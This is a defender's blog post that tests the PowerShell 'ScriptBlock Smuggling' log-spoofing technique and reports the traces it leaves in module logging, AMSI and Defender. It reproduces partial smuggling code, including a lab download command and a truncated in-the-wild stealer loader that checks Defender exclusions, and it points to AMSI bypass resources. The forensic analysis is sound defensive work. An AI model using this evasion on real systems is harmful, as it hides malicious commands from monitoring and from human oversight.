ScriptBlock Smuggling
2024-9-13 19:47:7 Author:查看原文) 阅读量:6 收藏


PowerShell’s Script Block Logging is a security feature that records and logs the contents of all scripts and commands executed within PowerShell. This includes both legitimate administrative scripts and potentially malicious commands. When enabled, Script Block Logging generates detailed logs stored in the Windows Event Log under Microsoft-Windows-PowerShell/Operational.

I have previously tweeted several times about PowerShell and why monitoring the executed PowerShell scripts is so important. A few of these tweets are listed here.

Within PowerShell Script Block Logging, we distinguish three types:

  • Script Block Logging: Captures and logs the content of all script blocks (scripts and commands) executed within PowerShell.
  • Module Logging: Logs activities performed by PowerShell modules, which can help monitor specific cmdlet usage. In our lab, we set the list of logged modules to “*”, meaning we log everything that happens in a PowerShell session. This will come in handy later on.
  • Transcript Logging: Records a full transcript of all PowerShell sessions, including input and output, in plain text files.

Recently, BC-Security presented a new technique with which PowerShell code can be executed in such a way that it no longer appears in the script block log:

ScriptBlock Smuggling allows an attacker to spoof any arbitrary message into the ScriptBlock logs while bypassing AMSI. To make things more interesting, it also does not require any reflection or memory patching to be executed.

In this blog post, we take a closer look at this technique, particularly which forensic traces we find when attackers utilize ScriptBlock Smuggling. For a better understanding of the technique, the original blog post from BC-Security should be read first, as this blog post here only deals with testing the technique and the resulting forensic artifacts.


First, we activate the various PowerShell script logging options in our lab to collect as many PowerShell forensic traces as possible. Configure PowerShell logging from Splunk is a good reference. Next, AtomicsonaFri announced on X a new AtomicRedTeam test for ScriptBlock Smuggling (the original post can be found here)

AtomicRedTeam Test for ScriptBlock Smuggling

Figure 1: AtomicRedTeam Test for ScriptBlock Smuggling

Here is the linked gist to the AtomicRedTeam test from the tweet above, copied out for further reference:

- name: ScriptBlock Smuggling
  description: This test demonstrates the use of ScriptBlock Smuggling to spoof PowerShell logs.
  - windows
      description: The benign command to be logged.
      type: string
      default: Write-Output 'Hello'
      description: The actual command to be executed.
      type: string
      default: Write-Output 'World'
    name: powershell
    command: |
      $SpoofedAst = [ScriptBlock]::Create("#{spoofed_command}").Ast
      $ExecutedAst = [ScriptBlock]::Create("#{executed_command}").Ast
      $Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,
      $Sb = $Ast.GetScriptBlock()

And here is the code we will use in our test scenario. We write Nothing to see here :) to the standard output, and this code will be our “cover up” for the code that downloads the icon from this webpage (

Again, $SpoofedAst will be the cover-up code, and $ExecutedAst will execute something malicious in a real-life scenario.

$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Nothing to see here :)'").Ast
$ExecutedAst = [ScriptBlock]::Create("Invoke-WebRequest '' 
-OutFile 'C:\Users\Public\favicon.ico'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,
$Sb = $Ast.GetScriptBlock()

Testing Results

Powershell Script Block Logging

Here is the logged code, which we defined in the variable $SpoofedAst above (Event 4104 is Powershell Script Block Logging):

$SpoofedAst code

Figure 2: $SpoofedAst code

However.. it might be correct that we don’t see an entry for the Script Block belonging to the $ExecutedAst variable, but:

$ExecutedAst code

Figure 3: $ExecutedAst code

The whole code used to disguise our malicious actions was captured! So what’s that technique really used for? Just to.. well.. kind of spoof - hide - deceive - our actions? X user SerkinValery also pointed out this flaw (?) in the attack chain (Source).

Powershell Module Logging

This Smuggling attack would only trick the logging in the Script Block Log, EventID 4104. However, we also enabled Event ID 4103 – Module logging, which also captures evidence of the executed PowerShell code on our machine. As the module log might not be as comfortable to read or parse from a monitoring standpoint, we still could find evidence of an infection chain or an ongoing attack.

Powershell Module Logging

Figure 4: Powershell Module Logging

And the attackers?

Nasreddine posted the following tweet on X:

@nas_bench’s tweet on X

Figure 5: @nas_bench's tweet on X

A truncated version of the full “Play along” gist is depicted below:

function FxC {
    param (
    $x = Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
    return $x -contains $p

$z1 = "$env:USERPROFILE\AppData"
$z2 = "C:\ProgramData"

do {
    Start-Sleep -Seconds 1
} until ((FxC -p $z1) -and (FxC -p $z2))

$x2fM3d = [ScriptBlock]::Create(("G"+"et-"+"Da"+"te"))
$y6uL4q = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($w9eR1a))
$k3mV5x = [ScriptBlock]::Create($y6uL4q)
$j4bN2t = $x2fM3d.Ast
$z7qX1w = $k3mV5x.Ast
$h9gP3d = $j4bN2t.Copy()
$v2mL4k = $z7qX1w.EndBlock.Copy()
$s1dR6j = [System.Management.Automation.Language.ScriptBlockAst]::new(
$r3gY2aBlock = $s1dR6j.GetScriptBlock()
$r3gY2aBlock.Invoke() | Out-String

According to the X user @thomasmechen, attackers adapted quickly and used this technique to spread Vidar-Stealer:

Vidar Stealer

Figure 6: Vidar Stealer

When I executed this code in my lab environment, I found detailed code inside the Module log, as discussed before.

Powershell Module Logging

Figure 7: Powershell Module Logging

AMSI / Windows Defender

AV providers are catching up, too. AMSI (the Anti-Malware Scan Interface) flagged our testing code as malicious.

 At line:1 char:1
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent 

There are some good techniques to bypass AMSI, here is a good starting point. However, carefully monitor these AMSI alerts in your environment, as this could be the first stage of an infection chain or an attacker who tries to load additional code into memory or download tooling onto the server.

Powershell Module Logging Overview

Figure 8: Powershell Module Logging Overview

Windows Defender detects (at least) the out-of-the-box PowerShell Smuggling code as malicious and generates an alert regarding Trojan:PowerShell/ScriptSmug.A.

Windows Defender Alert - Trojan:PowerShell/ScriptSmug.A

Figure 9: Windows Defender Alert - Trojan:PowerShell/ScriptSmug.A


At first glance, I found the script block smuggling technique exciting, but at second glance, there are still so many traces left behind that we, as defenders, still have ways of detecting malicious PowerShell code brought to the system via this attack vector.

The initial code should, therefore, still be obfuscated to such an extent that it’s not trivial for a monitoring solution to detect the malicious smuggling code. But then - why use this technique in the first place?
